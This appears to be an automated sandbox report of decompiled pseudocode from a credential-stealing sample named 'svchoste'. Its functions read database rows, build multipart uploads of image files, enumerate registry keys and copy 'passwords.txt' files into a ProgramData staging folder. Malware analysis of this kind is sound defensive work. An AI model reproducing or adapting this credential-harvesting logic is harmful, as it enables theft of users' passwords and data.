				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				void* __ebp;
				signed int _t123;
				signed int _t124;
				void* _t132;
				int _t133;
				void* _t136;
				intOrPtr _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t148;
				intOrPtr* _t152;
				intOrPtr _t153;
				intOrPtr _t163;
				void* _t167;
				intOrPtr* _t177;
				intOrPtr _t178;
				intOrPtr _t188;
				void* _t192;
				void* _t201;
				intOrPtr _t202;
				char _t215;
				intOrPtr _t218;
				char _t228;
				intOrPtr _t231;
				char _t240;
				char _t241;
				intOrPtr _t243;
				intOrPtr _t246;
				intOrPtr _t255;
				intOrPtr _t259;
				intOrPtr _t265;
				intOrPtr _t269;
				void* _t272;
				void* _t273;
				signed int _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t281;

				_t273 = __esi;
				_t272 = __edi;
				_t201 = __ebx;
				_t123 =  *0xba01f4; // 0xac8b3e58
				_t124 = _t123 ^ _t274;
				_v20 = _t124;
				 *[fs:0x0] =  &_v16;
				GetCurrentDirectoryA(0x104,  &_v352);
				_t202 =  *0xba2400; // 0x2d066f0
				 *0xba28c4( &_v352, _t202, _t124,  *[fs:0x0], E00B965BC, 0xffffffff);
				CopyFileA(_a8,  &_v352, 1);
				_t243 =  *0xba2158; // 0x2d06d10
				_v84 = _t243;
				_t132 =  *0xba2750( &_v352,  &_v80); // executed
				_t277 = _t275 - 0x1a8 + 8;
				if(_t132 == 0) {
					_t136 =  *0xba2700(_v80, _v84, 0xffffffff,  &_v88, 0);
					_t278 = _t277 + 0x14;
					if(_t136 == 0) {
						_t246 =  *0xba2188; // 0x2d06700
						_t140 =  *0xba25d0; // 0x2d06af0
						_t141 = E00B755AB(_t140, _t246); // executed
						_t278 = _t278 + 8;
						_v356 = _t141;
						if(_v356 != 0) {
							while(1) {
								L3:
								_t142 =  *0xba2720(_v88);
								_t281 = _t278 + 4;
								if(_t142 != 0x64) {
									break;
								}
								_v364 =  *0xba273c(_v88, 0);
								_v360 =  *0xba273c(_v88, 1);
								_t148 =  *0xba272c(_v88, 2, _a16, _a20);
								E00B8D730(_t201,  &_v392,  *0xba2734(), _v88, 2, _t148);
								_t278 = _t281 + 0x34;
								_v8 = 0;
								_v396 = 0xb9942e;
								_v400 = E00B71330( &_v392);
								while(1) {
									_t152 = _v400;
									_t215 =  *_t152;
									_v401 = _t215;
									if(_t215 !=  *_v396) {
										break;
									}
									if(_v401 == 0) {
										L9:
										_v408 = 0;
									} else {
										_t152 = _v400;
										_t241 =  *((intOrPtr*)(_t152 + 1));
										_v402 = _t241;
										_t37 = _v396 + 1; // 0x69620a00
										if(_t241 !=  *_t37) {
											break;
										} else {
											_v400 = _v400 + 2;
											_v396 = _v396 + 2;
											if(_v402 != 0) {
												continue;
											} else {
												goto L9;
											}
										}
									}
									L11:
									_v412 = _v408;
									if(_v412 != 0) {
										_t153 =  *0xba239c; // 0x2d06a60
										E00B755C2(_t201, _t272, _t273, __eflags);
										E00B755C2(_t201, _t272, _t273, __eflags);
										_t218 =  *0xba23b8; // 0x2d06a30
										E00B755C2(_t201, _t272, _t273, __eflags);
										E00B755C2(_t201, _t272, _t273, __eflags);
										_t255 =  *0xba2258; // 0x2d068b0
										E00B755C2(_t201, _t272, _t273, __eflags);
										E00B755C2(_t201, _t272, _t273, __eflags);
										_t163 =  *0xba22b4; // 0x2d06b80
										E00B755C2(_t201, _t272, _t273, __eflags);
										E00B755C2(_t201, _t272, _t273, __eflags);
										_t167 =  *0xba272c(_v88, 2, _a16, _a20, _v356, "\n", _v356, _t163, _v360, _v356, "\n", _v356, _t255, _v364, _v356, "\n", _v356, _t218, _a12, _v356, "\n", _v356, _t153, _a4);
										_v440 = E00B8D730(_t201,  &_v76,  *0xba2734(), _v88, 2, _t167);
										_push(E00B71330(_v440));
										_t259 =  *0xba26c4; // 0x2d06b50
										_push(_t259);
										_push(_v356);
										E00B755C2(_t201, _t272, _t273, __eflags);
										E00B712D0( &_v76);
										_push("\n\n");
										_push(_v356);
										E00B755C2(_t201, _t272, _t273, __eflags);
										_t278 = _t278 + 0x88;
									} else {
										_v416 = 0xb9942f;
										_v420 = _v360;
										while(1) {
											_t177 = _v420;
											_t228 =  *_t177;
											_v421 = _t228;
											if(_t228 !=  *_v416) {
												break;
											}
											if(_v421 == 0) {
												L17:
												_v428 = 0;
											} else {
												_t177 = _v420;
												_t240 =  *((intOrPtr*)(_t177 + 1));
												_v422 = _t240;
												_t59 = _v416 + 1; // 0x7469620a
												if(_t240 !=  *_t59) {
													break;
												} else {
													_v420 = _v420 + 2;
													_v416 = _v416 + 2;
													if(_v422 != 0) {
														continue;
													} else {
														goto L17;
													}
												}
											}
											L19:
											_v432 = _v428;
											if(_v432 != 0) {
												_t178 =  *0xba239c; // 0x2d06a60
												E00B755C2(_t201, _t272, _t273, __eflags);
												E00B755C2(_t201, _t272, _t273, __eflags);
												_t231 =  *0xba23b8; // 0x2d06a30
												E00B755C2(_t201, _t272, _t273, __eflags);
												E00B755C2(_t201, _t272, _t273, __eflags);
												_t265 =  *0xba2258; // 0x2d068b0
												E00B755C2(_t201, _t272, _t273, __eflags);
												E00B755C2(_t201, _t272, _t273, __eflags);
												_t188 =  *0xba22b4; // 0x2d06b80
												E00B755C2(_t201, _t272, _t273, __eflags);
												E00B755C2(_t201, _t272, _t273, __eflags);
												_t192 =  *0xba272c(_v88, 2, _a16, _a20, _v356, "\n", _v356, _t188, _v360, _v356, "\n", _v356, _t265, _v364, _v356, "\n", _v356, _t231, _a12, _v356, "\n", _v356, _t178, _a4);
												_v436 = E00B8D730(_t201,  &_v48,  *0xba2734(), _v88, 2, _t192);
												_push(E00B71330(_v436));
												_t269 =  *0xba26c4; // 0x2d06b50
												_push(_t269);
												_push(_v356);
												E00B755C2(_t201, _t272, _t273, __eflags);
												E00B712D0( &_v48);
												_push("\n\n");
												_push(_v356);
												E00B755C2(_t201, _t272, _t273, __eflags);
												_t278 = _t278 + 0x88;
											}
											goto L24;
										}
										asm("sbb eax, eax");
										asm("sbb eax, 0xffffffff");
										_v428 = _t177;
										goto L19;
									}
									L24:
									_v8 = 0xffffffff;
									E00B712D0( &_v392);
									goto L3;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								_v408 = _t152;
								goto L11;
							}
							_push(_v356);
							E00B75EA3(_t201, _v356, _t272, _t273, __eflags);
							_t278 = _t281 + 4;
						}
					}
					 *0xba2724(_v88);
					 *0xba2754(_v80);
				}
				_t133 = DeleteFileA( &_v352); // executed
				 *[fs:0x0] = _v16;
				__eflags = _v20 ^ _t274;
				return E00B74354(_t133, _t201, _v20 ^ _t274,  &_v352, _t272, _t273);
			}

0x00b8e0e0
0x00b8e0e0
0x00b8e0e0
0x00b8e0f7
0x00b8e0fc
0x00b8e0fe
0x00b8e105
0x00b8e117
0x00b8e11d
0x00b8e12b
0x00b8e13e
0x00b8e144
0x00b8e14a
0x00b8e158
0x00b8e15e
0x00b8e163
0x00b8e179
0x00b8e17f
0x00b8e184
0x00b8e18a
0x00b8e191
0x00b8e197
0x00b8e19c
0x00b8e19f
0x00b8e1ac
0x00b8e1b2
0x00b8e1b2
0x00b8e1b6
0x00b8e1bc
0x00b8e1c2
0x00000000
0x00000000
0x00b8e1d7
0x00b8e1ec
0x00b8e200
0x00b8e221
0x00b8e226
0x00b8e229
0x00b8e230
0x00b8e245
0x00b8e24b
0x00b8e24b
0x00b8e251
0x00b8e253
0x00b8e261
0x00000000
0x00000000
0x00b8e26a
0x00b8e29d
0x00b8e29d
0x00b8e26c
0x00b8e26c
0x00b8e272
0x00b8e275
0x00b8e281
0x00b8e284
0x00000000
0x00b8e286
0x00b8e286
0x00b8e28d
0x00b8e29b
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8e29b
0x00b8e284
0x00b8e2b4
0x00b8e2ba
0x00b8e2c7
0x00b8e4a3
0x00b8e4b0
0x00b8e4c4
0x00b8e4d0
0x00b8e4de
0x00b8e4f2
0x00b8e501
0x00b8e50f
0x00b8e523
0x00b8e532
0x00b8e53f
0x00b8e553
0x00b8e569
0x00b8e58f
0x00b8e5a0
0x00b8e5a1
0x00b8e5a7
0x00b8e5ae
0x00b8e5af
0x00b8e5ba
0x00b8e5bf
0x00b8e5ca
0x00b8e5cb
0x00b8e5d0
0x00b8e2cd
0x00b8e2cd
0x00b8e2dd
0x00b8e2e3
0x00b8e2e3
0x00b8e2e9
0x00b8e2eb
0x00b8e2f9
0x00000000
0x00000000
0x00b8e302
0x00b8e335
0x00b8e335
0x00b8e304
0x00b8e304
0x00b8e30a
0x00b8e30d
0x00b8e319
0x00b8e31c
0x00000000
0x00b8e31e
0x00b8e31e
0x00b8e325
0x00b8e333
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8e333
0x00b8e31c
0x00b8e34c
0x00b8e352
0x00b8e35f
0x00b8e36a
0x00b8e377
0x00b8e38b
0x00b8e397
0x00b8e3a5
0x00b8e3b9
0x00b8e3c8
0x00b8e3d6
0x00b8e3ea
0x00b8e3f9
0x00b8e406
0x00b8e41a
0x00b8e430
0x00b8e456
0x00b8e467
0x00b8e468
0x00b8e46e
0x00b8e475
0x00b8e476
0x00b8e481
0x00b8e486
0x00b8e491
0x00b8e492
0x00b8e497
0x00b8e497
0x00000000
0x00b8e49a
0x00b8e341
0x00b8e343
0x00b8e346
0x00000000
0x00b8e346
0x00b8e5d3
0x00b8e5d3
0x00b8e5e0
0x00000000
0x00b8e5e0
0x00b8e2a9
0x00b8e2ab
0x00b8e2ae
0x00000000
0x00b8e2ae
0x00b8e5f0
0x00b8e5f1
0x00b8e5f6
0x00b8e5f6
0x00b8e1ac
0x00b8e5fd
0x00b8e60a
0x00b8e610
0x00b8e61a
0x00b8e623
0x00b8e62e
0x00b8e638

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,AC8B3E58), ref: 00B8E117
lstrcat.KERNEL32(?,02D066F0), ref: 00B8E12B
CopyFileA.KERNEL32(?,?,00000001), ref: 00B8E13E
DeleteFileA.KERNEL32(?), ref: 00B8E61A

Part of subcall function 00B755AB: __fsopen.LIBCMT ref: 00B755B8

Part of subcall function 00B8D730: _memset.LIBCMT ref: 00B8D7A4
Part of subcall function 00B8D730: LocalAlloc.KERNEL32(00000040,?), ref: 00B8D7F3

_fprintf.LIBCMT ref: 00B8E377
_fprintf.LIBCMT ref: 00B8E38B
_fprintf.LIBCMT ref: 00B8E3A5
_fprintf.LIBCMT ref: 00B8E3B9
_fprintf.LIBCMT ref: 00B8E3D6
_fprintf.LIBCMT ref: 00B8E3EA
_fprintf.LIBCMT ref: 00B8E406
_fprintf.LIBCMT ref: 00B8E476
_fprintf.LIBCMT ref: 00B8E492
_fprintf.LIBCMT ref: 00B8E41A

Part of subcall function 00B755C2: __lock_file.LIBCMT ref: 00B75609
Part of subcall function 00B755C2: __stbuf.LIBCMT ref: 00B7568D
Part of subcall function 00B755C2: __output_l.LIBCMT ref: 00B7569D
Part of subcall function 00B755C2: __ftbuf.LIBCMT ref: 00B756A7

_fprintf.LIBCMT ref: 00B8E4B0
_fprintf.LIBCMT ref: 00B8E4C4
_fprintf.LIBCMT ref: 00B8E4DE
_fprintf.LIBCMT ref: 00B8E4F2
_fprintf.LIBCMT ref: 00B8E50F
_fprintf.LIBCMT ref: 00B8E523
_fprintf.LIBCMT ref: 00B8E53F
_fprintf.LIBCMT ref: 00B8E553
_fprintf.LIBCMT ref: 00B8E5AF
_fprintf.LIBCMT ref: 00B8E5CB

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _fprintf$File$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
String ID:
API String ID: 3148340754-0
Opcode ID: abf99b25ff1b4ebcfecdd320292941bbae649052f3dbcb1e3c088a370baeb92a
Instruction ID: 4b54fcce93f8087464d3d127e16b68541b1682777ae337206f0aed4b3e123bd2
Opcode Fuzzy Hash: abf99b25ff1b4ebcfecdd320292941bbae649052f3dbcb1e3c088a370baeb92a
Instruction Fuzzy Hash: 30E150B1E00218ABCB24DFA8DC46FEFB7B5AB59300F0481D8F519A7291DA759E84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B918C0, Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00B918C0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, CHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v16;
				signed int _v20;
				char _v48;
				intOrPtr _v52;
				long _v56;
				char _v84;
				char _v112;
				void* _v116;
				long _v120;
				void* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				signed int _t94;
				signed int _t95;
				int _t98;
				signed char _t120;
				signed char _t122;
				signed char _t123;
				signed char _t125;
				intOrPtr _t142;
				void* _t155;
				signed int _t195;
				intOrPtr _t217;
				void* _t223;
				void* _t224;
				signed int _t225;

				_t224 = __esi;
				_t223 = __edi;
				_t211 = __edx;
				_t155 = __ebx;
				_push(0xffffffff);
				_push(E00B96522);
				_push( *[fs:0x0]);
				_t94 =  *0xba01f4; // 0xac8b3e58
				_t95 = _t94 ^ _t225;
				_v20 = _t95;
				_push(_t95);
				 *[fs:0x0] =  &_v16;
				_v124 = __ecx;
				_t98 = CreateFileA(_a8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v116 = _t98;
				if(_v116 != 0xffffffff) {
					_v56 = GetFileSize(_v116, 0);
					__eflags = _v56 - 1;
					if(_v56 >= 1) {
						E00B711C0( &_v112, _a8);
						_v8 = 0;
						_v52 = E00B71F10( &_v112, 0x5c, E00B71350( &_v112) - 1) + 1;
						_v128 = E00B71F30( &_v112,  &_v48, _v52, E00B71350( &_v112) - _v52);
						_v132 = _v128;
						_v8 = 1;
						E00B71E70( &_v112, _v132);
						_v8 = 0;
						E00B712D0( &_v48);
						_v52 = E00B71F10( &_v112, 0x2e, E00B71350( &_v112) - 1) + 1;
						E00B71F30( &_v112,  &_v84, _v52, E00B71350( &_v112) - _v52);
						_v8 = 2;
						_t120 = E00B72C70( &_v84, "jpg");
						__eflags = _t120 & 0x000000ff;
						if((_t120 & 0x000000ff) == 0) {
							_t122 = E00B72C70( &_v84, "gif");
							__eflags = _t122 & 0x000000ff;
							if((_t122 & 0x000000ff) == 0) {
								_t123 = E00B72C70( &_v84, "png");
								__eflags = _t123 & 0x000000ff;
								if((_t123 & 0x000000ff) == 0) {
									_t125 = E00B72C70( &_v84, "tiff");
									__eflags = _t125 & 0x000000ff;
									if((_t125 & 0x000000ff) != 0) {
										_t125 = E00B71EA0( &_v84, "image/tiff");
									}
								} else {
									_t125 = E00B71EA0( &_v84, "image/png");
								}
							} else {
								_t125 = E00B71EA0( &_v84, "image/gif");
							}
						} else {
							_t125 = E00B71EA0( &_v84, "image/jpeg");
						}
						E00B91740(_t125, _v124, "--");
						E00B91740(E00B91740(E00B91740(E00B91740(E00B91740(_v124 + 0x10, _v124, _v124 + 0x10), _v124, "\r\n"), _v124, "Content-Disposition: form-data; name=\""), _v124, _a4), _v124, "\"; filename=\"");
						E00B91740(E00B91740(E00B91740(E00B71330( &_v112), _v124, _t134), _v124, "\"\r\n"), _v124, "Content-Type: ");
						E00B91740(E00B91740(E00B91740(E00B71330( &_v84), _v124, _t138), _v124, "\r\n"), _v124, "\r\n");
						_t217 = _v124;
						_t142 = _v124;
						__eflags =  *((intOrPtr*)(_t217 + 4)) -  *((intOrPtr*)(_t142 + 8)) - 1 - _v56;
						if( *((intOrPtr*)(_t217 + 4)) -  *((intOrPtr*)(_t142 + 8)) - 1 < _v56) {
							__eflags = _v56 -  *((intOrPtr*)(_v124 + 4)) -  *(_v124 + 8) - 1;
							E00B914F0(_v124, _t223, _t224, _v56 -  *((intOrPtr*)(_v124 + 4)) -  *(_v124 + 8) - 1, _v56 -  *((intOrPtr*)(_v124 + 4)) -  *(_v124 + 8) - 1);
						}
						ReadFile(_v116,  *_v124 +  *(_v124 + 8), _v56,  &_v120, 0); // executed
						_t195 =  *(_v124 + 8) + _v120;
						__eflags = _t195;
						_t211 = _v124;
						 *(_v124 + 8) = _t195;
						E00B91740(CloseHandle(_v116), _v124, "\r\n");
						_v8 = 0;
						E00B712D0( &_v84);
						_v8 = 0xffffffff;
						_t98 = E00B712D0( &_v112);
					} else {
						_t211 = _v116;
						_t98 = CloseHandle(_v116);
					}
				}
				 *[fs:0x0] = _v16;
				return E00B74354(_t98, _t155, _v20 ^ _t225, _t211, _t223, _t224);
			}

0x00b918c0
0x00b918c0
0x00b918c0
0x00b918c0
0x00b918c3
0x00b918c5
0x00b918d0
0x00b918d4
0x00b918d9
0x00b918db
0x00b918de
0x00b918e2
0x00b918e8
0x00b91901
0x00b91907
0x00b9190e
0x00b91921
0x00b91924
0x00b91928
0x00b91940
0x00b91945
0x00b91965
0x00b91984
0x00b9198a
0x00b9198d
0x00b91998
0x00b9199d
0x00b919a4
0x00b919c2
0x00b919dc
0x00b919e1
0x00b919ee
0x00b919f9
0x00b919fb
0x00b91a15
0x00b91a20
0x00b91a22
0x00b91a3c
0x00b91a47
0x00b91a49
0x00b91a63
0x00b91a6e
0x00b91a70
0x00b91a7a
0x00b91a7a
0x00b91a4b
0x00b91a53
0x00b91a53
0x00b91a24
0x00b91a2c
0x00b91a2c
0x00b919fd
0x00b91a05
0x00b91a05
0x00b91a87
0x00b91ac9
0x00b91af4
0x00b91b1f
0x00b91b24
0x00b91b27
0x00b91b33
0x00b91b36
0x00b91b4a
0x00b91b50
0x00b91b50
0x00b91b6f
0x00b91b7b
0x00b91b7b
0x00b91b7e
0x00b91b81
0x00b91b96
0x00b91b9b
0x00b91ba2
0x00b91ba7
0x00b91bb1
0x00b9192a
0x00b9192a
0x00b9192e
0x00b9192e
0x00b91928
0x00b91bb9
0x00b91bce

APIs

CreateFileA.KERNEL32(00B91212,80000000,00000001,00000000,00000003,00000080,00000000,AC8B3E58), ref: 00B91901
GetFileSize.KERNEL32(000000FF,00000000), ref: 00B9191B
CloseHandle.KERNEL32(000000FF), ref: 00B9192E

Strings

Content-Disposition: form-data; name=", xrefs: 00B91AA8
gif, xrefs: 00B91A0C
Content-Type: , xrefs: 00B91AEC
png, xrefs: 00B91A33
image/jpeg, xrefs: 00B919FD
image/tiff, xrefs: 00B91A72
tiff, xrefs: 00B91A5A
", xrefs: 00B91ADF
jpg, xrefs: 00B919E5
"; filename=", xrefs: 00B91AC1
image/png, xrefs: 00B91A4B
image/gif, xrefs: 00B91A24

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID: "$"; filename="$Content-Disposition: form-data; name="$Content-Type: $gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
API String ID: 1378416451-1458791827
Opcode ID: 1c39001e86b42d46bc1e0204dfff3efa77160857105d4a31fc794162fd800adb
Instruction ID: edb9b2391ad2533dee42edefd7fec8a6ff67f4f5ade787ec976303b6259f7a5c
Opcode Fuzzy Hash: 1c39001e86b42d46bc1e0204dfff3efa77160857105d4a31fc794162fd800adb
Instruction Fuzzy Hash: B8913A71904209ABDF14EBF8DC95EEDB7B9BF54300F2085ADE416AB292DB706D04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B8AC90, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 158
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00B8AC90(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v1036;
				char _v2060;
				void* _v2064;
				void* _v2068;
				int* _v2072;
				int _v2076;
				char _v3100;
				char _v203100;
				char* _v203104;
				int _v203108;
				intOrPtr* _v203112;
				intOrPtr _v203116;
				char _v203117;
				intOrPtr _v203124;
				signed int _t66;
				long _t71;
				char* _t73;
				long _t76;
				long _t80;
				long _t82;
				long _t89;
				void* _t98;
				char* _t99;
				char* _t108;
				char* _t115;
				void* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				void* _t132;

				_t129 = __esi;
				_t128 = __edi;
				_t98 = __ebx;
				E00B82A40(0x31970);
				_t66 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t66 ^ _t130;
				E00B791C0( &_v203100, 0, 0x30d40);
				_t132 = _t131 + 0xc;
				_v2068 = 0;
				_v2064 = 0;
				_t99 =  *0xba244c; // 0x2d07490
				_v203104 = _t99;
				_v2072 = 0;
				_v8 = 0xf003f;
				_v2076 = 0;
				_t117 =  &_v2068;
				_t71 = RegOpenKeyExA(0x80000002, _v203104, 0, 0x20019,  &_v2068); // executed
				if(_t71 == 0) {
					_v203108 = 0;
					while(_v2072 == 0) {
						_v2076 = 0x400;
						_t76 = RegEnumKeyExA(_v2068, _v203108,  &_v1036,  &_v2076, 0, 0, 0, 0); // executed
						_v2072 = _t76;
						if(_v2072 != 0) {
							L16:
							_v203108 = _v203108 + 1;
							continue;
						} else {
							wsprintfA( &_v2060, "%s\\%s", _v203104,  &_v1036);
							_t132 = _t132 + 0x10;
							_t80 = RegOpenKeyExA(0x80000002,  &_v2060, 0, 0x20019,  &_v2064); // executed
							if(_t80 == 0) {
								_v2076 = 0x400;
								_t108 =  *0xba2678; // 0x2d06c70
								_t82 = RegQueryValueExA(_v2064, _t108, 0,  &_v8,  &_v3100,  &_v2076); // executed
								if(_t82 == 0) {
									_v203112 =  &_v3100;
									_v203116 = _v203112 + 1;
									do {
										_v203117 =  *_v203112;
										_v203112 = _v203112 + 1;
									} while (_v203117 != 0);
									_v203124 = _v203112 - _v203116;
									if(_v203124 > 1) {
										 *0xba28c4( &_v203100,  &_v3100);
										_v2076 = 0x400;
										_t115 =  *0xba2418; // 0x2d06c40
										_t89 = RegQueryValueExA(_v2064, _t115, 0,  &_v8,  &_v3100,  &_v2076); // executed
										if(_t89 == 0) {
											 *0xba28c4( &_v203100, " ");
											 *0xba28c4( &_v203100,  &_v3100);
										}
										 *0xba28c4( &_v203100, "\n");
									}
								}
								RegCloseKey(_v2064);
								goto L16;
							} else {
								_t117 = _v2064;
								RegCloseKey(_v2064);
								RegCloseKey(_v2068);
								_t73 =  &_v203100;
							}
						}
						goto L18;
					}
					_t117 = _v2068;
					RegCloseKey(_v2068);
					_t73 =  &_v203100;
				} else {
					_t73 =  &_v203100;
				}
				L18:
				return E00B74354(_t73, _t98, _v12 ^ _t130, _t117, _t128, _t129);
			}

0x00b8ac90
0x00b8ac90
0x00b8ac90
0x00b8ac98
0x00b8ac9d
0x00b8aca4
0x00b8acb5
0x00b8acba
0x00b8acbd
0x00b8acc7
0x00b8acd1
0x00b8acd7
0x00b8acdd
0x00b8ace7
0x00b8acee
0x00b8acf8
0x00b8ad12
0x00b8ad1a
0x00b8ad27
0x00b8ad42
0x00b8ad4f
0x00b8ad7d
0x00b8ad83
0x00b8ad90
0x00b8af23
0x00b8ad3c
0x00000000
0x00b8ad96
0x00b8adb0
0x00b8adb6
0x00b8add3
0x00b8addb
0x00b8ae02
0x00b8ae20
0x00b8ae2e
0x00b8ae36
0x00b8ae42
0x00b8ae51
0x00b8ae57
0x00b8ae5f
0x00b8ae65
0x00b8ae6c
0x00b8ae81
0x00b8ae8e
0x00b8aea2
0x00b8aea8
0x00b8aec6
0x00b8aed4
0x00b8aedc
0x00b8aeea
0x00b8aefe
0x00b8aefe
0x00b8af10
0x00b8af10
0x00b8ae8e
0x00b8af1d
0x00000000
0x00b8addd
0x00b8addd
0x00b8ade4
0x00b8adf1
0x00b8adf7
0x00b8adf7
0x00b8addb
0x00000000
0x00b8ad90
0x00b8af28
0x00b8af2f
0x00b8af35
0x00b8ad1c
0x00b8ad1c
0x00b8ad1c
0x00b8af3b
0x00b8af48

APIs

_memset.LIBCMT ref: 00B8ACB5
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,00000000), ref: 00B8AD12
RegEnumKeyExA.KERNEL32(00000000,?,?,00000400,00000000,00000000,00000000,00000000), ref: 00B8AD7D
wsprintfA.USER32 ref: 00B8ADB0
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 00B8ADD3
RegCloseKey.ADVAPI32(?), ref: 00B8ADE4
RegCloseKey.ADVAPI32(?), ref: 00B8ADF1

Strings

?, xrefs: 00B8ACE7
%s\%s, xrefs: 00B8ADA4

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: CloseOpen$Enum_memsetwsprintf
String ID: %s\%s$?
API String ID: 1655683433-4134130046
Opcode ID: f9d69bd650aa5858b68f31d0857e0f9f8e21d1f812c84c63c980f4d2ef0677e6
Instruction ID: 9361d0e65b6f1018fa20d65c789aa1348eb3fd6a86cdc164585fdac4150fd113
Opcode Fuzzy Hash: f9d69bd650aa5858b68f31d0857e0f9f8e21d1f812c84c63c980f4d2ef0677e6
Instruction Fuzzy Hash: 6E6127B190121C9BDB25DB54CC95BE9B7BDFB49700F0081DAE209A6190DB745AC9CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B94D00, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 79
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00B94D00(void* __ebx, CHAR* __edx, void* __edi, void* __esi, void* __eflags, CHAR* _a8, intOrPtr _a12, intOrPtr _a20) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v540;
				signed int _t21;
				intOrPtr _t25;
				void* _t41;
				intOrPtr _t54;
				signed int _t58;
				void* _t59;
				void* _t60;

				_t57 = __esi;
				_t56 = __edi;
				_t51 = __edx;
				_t42 = __ebx;
				_t21 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t21 ^ _t58;
				SetCurrentDirectoryA(_a8); // executed
				_t25 = E00B743DF(__ebx, _t51, __edi, __esi, _a12, 0xba1e70); // executed
				_t60 = _t59 + 8;
				_v8 = _t25;
				if(_v8 != 0xffffffff) {
					do {
						E00B791C0( &_v540, 0, 0x104);
						E00B791C0( &_v276, 0, 0x104);
						 *0xba28c4( &_v540, _a8);
						 *0xba28c4( &_v540, "passwords.txt");
						 *0xba28c4( &_v276, "C:\\ProgramData\\216363876181815");
						_t54 =  *0xba20c4; // 0x2d07ef8
						 *0xba28c4( &_v276, _t54);
						 *0xba28c4( &_v276, _a20);
						 *0xba28c4( &_v276, "passwords.txt");
						_t51 =  &_v540;
						CopyFileA( &_v540,  &_v276, 1); // executed
						_t41 = E00B74506(__ebx,  &_v540, __edi, __esi, _v8, 0xba1e70); // executed
						_t60 = _t60 + 0x20;
					} while (_t41 == 0);
					_t25 = E00B74634(_v8);
				}
				return E00B74354(_t25, _t42, _v12 ^ _t58, _t51, _t56, _t57);
			}

0x00b94d00
0x00b94d00
0x00b94d00
0x00b94d00
0x00b94d09
0x00b94d10
0x00b94d17
0x00b94d26
0x00b94d2b
0x00b94d2e
0x00b94d35
0x00b94d3b
0x00b94d49
0x00b94d5f
0x00b94d72
0x00b94d84
0x00b94d96
0x00b94d9c
0x00b94daa
0x00b94dbb
0x00b94dcd
0x00b94ddc
0x00b94de3
0x00b94df2
0x00b94df7
0x00b94dfa
0x00b94e06
0x00b94e0b
0x00b94e1b

APIs

SetCurrentDirectoryA.KERNEL32(00B94F3F), ref: 00B94D17
__findfirst64i32.LIBCMT ref: 00B94D26
_memset.LIBCMT ref: 00B94D49
_memset.LIBCMT ref: 00B94D5F
lstrcat.KERNEL32(?,00B94F3F), ref: 00B94D72
lstrcat.KERNEL32(?,passwords.txt), ref: 00B94D84
lstrcat.KERNEL32(?,C:\\ProgramData\\216363876181815), ref: 00B94D96
lstrcat.KERNEL32(?,02D07EF8), ref: 00B94DAA
lstrcat.KERNEL32(?,00B94EE3), ref: 00B94DBB
lstrcat.KERNEL32(?,passwords.txt), ref: 00B94DCD
CopyFileA.KERNEL32(?,?,00000001), ref: 00B94DE3
__findnext64i32.LIBCMT ref: 00B94DF2

Strings

C:\\ProgramData\\216363876181815, xrefs: 00B94D8A
passwords.txt, xrefs: 00B94D78, 00B94DC1

Memory Dump Source

